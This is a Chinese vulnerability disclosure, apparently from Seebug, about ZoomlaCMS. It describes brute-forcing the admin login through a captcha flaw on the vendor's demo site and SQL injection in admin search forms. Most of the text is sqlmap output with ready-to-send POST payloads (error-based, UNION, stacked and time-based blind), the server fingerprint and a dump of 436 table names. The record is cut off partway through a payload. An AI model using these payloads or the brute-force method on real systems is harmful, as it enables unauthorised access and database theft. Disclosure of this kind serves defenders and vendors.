逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

2014-08-05T00:00:00
ID SSV:94210
Type seebug
Reporter Root
Modified 2014-08-05T00:00:00

Description

简要描述:

RT

详细说明:

问题有两个: 1.验证码设计不当可暴力猜解后台管理员账户密码; 2.后台多处注入漏洞(搜索处)可获取各种敏感信息。

漏洞证明:

1.验证码设计不当

逐浪后台地址:http://demo.zoomla.cn/Admin/login.aspx 一开始是没有验证码的,所以我爆破,但是发现会提示验证码错误。 填上验证码抓包继续对密码字段爆破,发现可以爆破成功。

<img src="https://images.seebug.org/upload/201408/04132927464ad6373e416a22d9d56888f5f78c55.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

成功进入后台:

<img src="https://images.seebug.org/upload/201408/041330224f0a8cde5b5677af273272070c191a56.jpg" alt="zoomla2.jpg" width="600" onerror="javascript:errimg(this);">

2.大面积的SQL注入漏洞:

a.首先是商品管理搜索处

<img src="https://images.seebug.org/upload/201408/04133131c2e809da93311355458e58647888bf4e.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

``` sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: (custom) POST Parameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4 Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4


web server operating system: Windows 8.1 or 2012 R2 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5 back-end DBMS: Microsoft SQL Server 2008 current database: 'demozoomla' ```

436个表:

Database: demozoomla [436 tables] +-----------------------------------+ | ZL_3DMusic | | ZL_3DPanoramic | | ZL_3DShop | | ZL_Accountinfo | | ZL_AdZone | | ZL_Adbuy | | ZL_AddRessList | | ZL_Advertisement | | ZL_Agent | | ZL_Allianceinfo | | ZL_Answer | | ZL_Answer_Recode | | ZL_App | | ZL_Arrive | | ZL_ArticleOrders | | ZL_ArticlePromotion | | ZL_Ask | | ZL_AskCommon | | ZL_Auction | | ZL_AuditingState | | ZL_Author | | ZL_Baike | | ZL_BaikeEdit | | ZL_Bbscate | | ZL_Bbstips | | ZL_BiaoQian | | ZL_Bid | | ZL_Bider | | ZL_BigLog | | ZL_BindFlolar | | ZL_BindPro | | ZL_BlogAnswer | | ZL_BlogAsk | | ZL_BlogContent | | ZL_BlogLiving | | ZL_BookRead | | ZL_BossInfo | | ZL_C_Announce | | ZL_C_Article | | ZL_C_Factory | | ZL_C_FriendSite | | ZL_C_Info | | ZL_C_Photo | | ZL_C_Plugins | | ZL_C_RedirectLink | | ZL_C_soft | | ZL_C_video | | ZL_CallNode | | ZL_CallNote | | ZL_Card | | ZL_CardType | | ZL_Cart | | ZL_CartPro | | ZL_Cash | | ZL_ChangeProduct | | ZL_ChangeTalk | | ZL_Chart | | ZL_Chat | | ZL_Class | | ZL_ClassRoom | | ZL_ClientRequire | | ZL_Client_Additional | | ZL_Client_Basic | | ZL_Client_Enterprise | | ZL_Client_Penson | | ZL_CollectionInfo | | ZL_CollectionItem | | ZL_Comment | | ZL_Commodities | | ZL_CommonModel | | ZL_CompSecretary | | ZL_Compete | | ZL_CompleteHistory | | ZL_ComponentClass | | ZL_ComponentPlatform | | ZL_Content_ScheTask | | ZL_Correct | | ZL_Count_Browser | | ZL_Count_Iplocal | | ZL_Count_Local | | ZL_Count_Month | | ZL_Count_Os | | ZL_Count_Site | | ZL_Count_Visitor | | ZL_Count_Year | | ZL_Count_dtproperties | | ZL_Course | | ZL_Courseware | | ZL_CpsClick | | ZL_CreateJS | | ZL_CrmAuthList | | ZL_CustomerService | | ZL_DataList | | ZL_DataSource | | ZL_Datadic | | ZL_Datadiccategory | | ZL_Defray | | ZL_Delivier | | ZL_DocList | | ZL_DocModel | | ZL_DocPermission | | ZL_DownServer | | ZL_EditWord | | ZL_EnrollList | | ZL_ExAnswer | | ZL_ExAttendance | | ZL_ExChange | | ZL_ExClassgroup | | ZL_ExLecturer | | ZL_ExStudent | | ZL_ExStudytime | | ZL_ExTeacher | | ZL_ExamPoint | | ZL_Exam_Class | | ZL_Exam_Sys_Papers | | ZL_Exam_Sys_Questions | | ZL_Exam_Type | | ZL_Examination | | ZL_Examinee | | ZL_Exroom | | ZL_FTPConfig | | ZL_Favorite | | ZL_File | | ZL_Flow | | ZL_Frient | | ZL_GiftCard_User | | ZL_GiftCard_shop | | ZL_Grade | | ZL_GradeCate | | ZL_Group | | ZL_GroupBuy | | ZL_GroupBuyList | | ZL_GroupFieldPermissions | | ZL_GroupModel | | ZL_GuestAnswer | | ZL_Guestbook | | ZL_Guestcate | | ZL_HidTopic | | ZL_Hits | | ZL_Honor | | ZL_IDC_DBList | | ZL_IDC_DNSSubDom | | ZL_IDC_DNSTable | | ZL_IDC_DomainList | | ZL_IDC_DomainLog | | ZL_IDC_DomainPrice | | ZL_IDC_DomainTemp | | ZL_IDC_Log | | ZL_IDC_Server | | ZL_IDC_SiteList | | ZL_IPUrl | | ZL_IPclass | | ZL_IPpara | | ZL_IServer | | ZL_IServerReply | | ZL_Interlocution | | ZL_InviteRecord | | ZL_InvtoType | | ZL_Keyword | | ZL_Keywords | | ZL_LinkName | | ZL_Log | | ZL_MTit | | ZL_Magazine | | ZL_MailIdiograph | | ZL_MailInfo | | ZL_MailManage | | ZL_MailReceive | | ZL_MailSet | | ZL_MailTemp | | ZL_MailType | | ZL_Manager | | ZL_Manufacturers | | ZL_Map | | ZL_MbClass | | ZL_MbComment | | ZL_MbTheme | | ZL_Mbtopic | | ZL_Message | | ZL_MiUserInfo | | ZL_Microb | | ZL_Mis | | ZL_MisApproval | | ZL_MisAttendance | | ZL_MisInfo | | ZL_MisPlan | | ZL_MisProLevel | | ZL_MisProcedure | | ZL_MisSign | | ZL_MisType | | ZL_Mis_AppProg | | ZL_Mis_Model | | ZL_Model | | ZL_ModelField | | ZL_MoneyManage | | ZL_MuClass | | ZL_MuPage | | ZL_MuPic | | ZL_MuProduct | | ZL_MuTemp | | ZL_MultiNode | | ZL_MySubscription | | ZL_Node | | ZL_NodeBindDroit | | ZL_NodeRole | | ZL_Node_ModelTemplate | | ZL_OAC_111 | | ZL_OA_BC | | ZL_OA_Document | | ZL_OA_FreePro | | ZL_OA_PBTable | | ZL_OA_Sign | | ZL_OA_UserConfig | | ZL_Online | | ZL_OnlineCusServ | | ZL_OnlineUsers | | ZL_OrderBaseField | | ZL_OrderDelivery | | ZL_OrderSql | | ZL_Order_LuckCode | | ZL_Order_PayLog | | ZL_Orderinfo | | ZL_P_Shop | | ZL_Package | | ZL_Page | | ZL_PageReg | | ZL_PageStyle | | ZL_PageTemplate | | ZL_Page_Content | | ZL_Page_fwefw | | ZL_Paper_Questions | | ZL_Papers_System | | ZL_Papers_User | | ZL_Passenger | | ZL_PayPlat | | ZL_Payment | | ZL_Permission | | ZL_Plan | | ZL_PlanSql | | ZL_PointGrounp | | ZL_PointRecord | | ZL_PointTrans | | ZL_Present | | ZL_Print | | ZL_PrintMode | | ZL_PrintPic | | ZL_PrintType | | ZL_Process | | ZL_Processes | | ZL_Project | | ZL_ProjectAffairs | | ZL_ProjectBaseField | | ZL_ProjectCategory | | ZL_ProjectDiscuss | | ZL_ProjectField | | ZL_ProjectType | | ZL_ProjectWork | | ZL_Projects | | ZL_ProjectsBase | | ZL_ProjectsComments | | ZL_PromoCount | | ZL_Promotion | | ZL_Promotions | | ZL_Pub | | ZL_Pub_TW | | ZL_Pub_WTHD | | ZL_Pub_WZTP | | ZL_Pub_ZJDA | | ZL_Pub_ZXDC | | ZL_Pub_huodong | | ZL_QrCode | | ZL_Question | | ZL_Questions | | ZL_Questions_Class | | ZL_Questions_Knowledge | | ZL_Questions_Type | | ZL_Questions_User | | ZL_RebateOrder | | ZL_Rebates | | ZL_Recruitment | | ZL_RedEnvelope | | ZL_Redindulgence | | ZL_Reg_Page | | ZL_Regsterapi | | ZL_Result | | ZL_Role | | ZL_RolePermissions | | ZL_RoomActive | | ZL_RoomActiveJoin | | ZL_RoomCall | | ZL_RoomInfo | | ZL_RoomMessage | | ZL_RoomNotify | | ZL_RoomUpFile | | ZL_RoomUser | | ZL_SQL | | ZL_S_FloGoods | | ZL_S_FloPack | | ZL_S_shop | | ZL_Scheme | | ZL_SchemeInfo | | ZL_School | | ZL_ScoreStatics | | ZL_Search | | ZL_Sensitivity | | ZL_ServiceSeat | | ZL_SettlementInfoList | | ZL_ShopCommentary | | ZL_ShopCompete | | ZL_ShopGrade | | ZL_ShopLable | | ZL_ShopNodeinfo | | ZL_Shopconfig | | ZL_Shopsearch | | ZL_Shopsite | | ZL_ShopsiteClass | | ZL_SitePas | | ZL_SitePicAdv | | ZL_SiteTextAdv | | ZL_Sns_Active | | ZL_Sns_ActiveJoin | | ZL_Sns_ActivePic | | ZL_Sns_ActiveType | | ZL_Sns_BlogStyleTable | | ZL_Sns_BookTable | | ZL_Sns_CarConfig | | ZL_Sns_CarLog | | ZL_Sns_Carlist | | ZL_Sns_ChatLog | | ZL_Sns_CollectTable | | ZL_Sns_CommendCommentOn | | ZL_Sns_CommentAll | | ZL_Sns_FileShare | | ZL_Sns_GSHuatee | | ZL_Sns_GSReverCricicism | | ZL_Sns_GSRoom | | ZL_Sns_GSType | | ZL_Sns_GatherStrain | | ZL_Sns_GroupPicCateg | | ZL_Sns_HomeCollocate | | ZL_Sns_HomeHeadCollocate | | ZL_Sns_Kiss | | ZL_Sns_Log | | ZL_Sns_LogCriticism | | ZL_Sns_LookLog | | ZL_Sns_LotMessage | | ZL_Sns_LotNote | | ZL_Sns_Memo | | ZL_Sns_Messageboard | | ZL_Sns_MyCar | | ZL_Sns_MyPose | | ZL_Sns_PicCateg | | ZL_Sns_PicCritique | | ZL_Sns_PicTure | | ZL_Sns_ProductTable | | ZL_Sns_ProductTypetable | | ZL_Sns_ReplayLog | | ZL_Sns_Report | | ZL_Sns_SystemBannerTable | | ZL_Sns_SystemLog | | ZL_Sns_UserLog | | ZL_Sns_UserLogType | | ZL_Sns_UserMoreinfo | | ZL_Sns_UserShopProduct | | ZL_Sns_User_R_GS | | ZL_Sns_User_R_Module | | ZL_Sns_blogTable | | ZL_Source | | ZL_SpecCate | | ZL_SpecInfo | | ZL_Special | | ZL_Stock | | ZL_StoreStyleTable | | ZL_Store_reg | | ZL_Structure | | ZL_Student | | ZL_SubscriptionCount | | ZL_Survey | | ZL_Trademark | | ZL_UAgent | | ZL_U_comp | | ZL_U_jl | | ZL_U_zp | | ZL_Ucenter | | ZL_UnionInfo | | ZL_User | | ZL_UserApp | | ZL_UserBase | | ZL_UserBaseField | | ZL_UserCaritHis | | ZL_UserCart | | ZL_UserCartPro | | ZL_UserClass | | ZL_UserCoinHis | | ZL_UserCourse | | ZL_UserDay | | ZL_UserExpDomP | | ZL_UserExpHis | | ZL_UserFave | | ZL_UserFriendGroup | | ZL_UserFriendTable | | ZL_UserGrade | | ZL_UserGroup | | ZL_UserOrderinfo | | ZL_UserPromotions | | ZL_UserPurview | | ZL_UserRecei | | ZL_UserRegisterIP | | ZL_UserRoom | | ZL_UserShop | | ZL_UserStock | | ZL_UserStoreTable | | ZL_UserStoreTypeTable | | ZL_VJobInfo | | ZL_VResume | | ZL_VRoom | | ZL_VideoHall | | ZL_VideoHouse | | ZL_VideoHouseApply | | ZL_VideoInfo | | ZL_VideoMessage | | ZL_VideoRoom | | ZL_VideoUser | | ZL_VideoUserFriend | | ZL_VideoUserGroup | | ZL_View | | ZL_ViewHistory | | ZL_WapArticle | | ZL_WorkRole | | ZL_Zone_Advertisement | | ZL_Zone_Node | | ZL_Zone_Site | | ZL_Zone_question | | ZL_page_app | | ZL_wxMsg | | demozoomla_f.ZL_Content_WordChain | +-----------------------------------+

b.访问评价处:

<img src="https://images.seebug.org/upload/201408/04133741dd35eeae76fd886ab3b49328743380c0.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

``` sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: (custom) POST Parameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" 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 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'=' ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??�������� ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1 ------WebKitFormBoundary5n6dB9dFzpkAYygr-- Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" 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